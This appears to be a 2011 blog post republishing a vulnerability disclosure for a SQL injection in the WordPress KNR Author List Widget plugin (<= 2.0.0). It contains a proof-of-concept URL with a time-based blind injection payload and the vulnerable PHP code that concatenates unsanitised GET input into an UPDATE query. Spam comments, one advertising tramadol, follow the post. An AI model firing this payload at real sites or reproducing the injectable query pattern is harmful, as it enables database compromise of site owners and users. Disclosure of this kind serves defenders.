Paths of an uncon(s)cious mind: WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability

Tuesday, September 6, 2011

WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injection Vulnerability

# Exploit Title: WordPress KNR Author List Widget plugin <= 2.0.0 SQL Injecti
on Vulnerability
# Date: 2011-09-06
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/knr-author-list-widget.zi
p
# Version: 2.0.0 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/knr-author-list-widget/knrAuthorListCusto
mSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,
109,97,112))),0)

---------------
Vulnerable code
---------------
foreach ($_GET['listItem'] as $position => $item) :
    $iterSql = "UPDATE $wpdb->users SET knr_author_order = $position WHERE ID = 
$item";
    $wpdb->query($iterSql);
endforeach;

p.s. author has been contacted (no reply yet)
p.p.s. this is a comment found here from the author of this same vulnerable plugin:

3 comments:

Aaron said...: Thank you! just what I was looking for. Would love to also read a guide by you that will discuss different ways of adding a uniqe comment system to my blog?; September 18, 2011 at 10:56 AM
Anonymous said...: I will be your frequent visitor, that's for sure. pain relief Read a useful article about tramadol tramadol; February 24, 2012 at 9:04 AM
Anonymous said...: busqueda que los hara consumidores; December 18, 2012 at 8:11 AM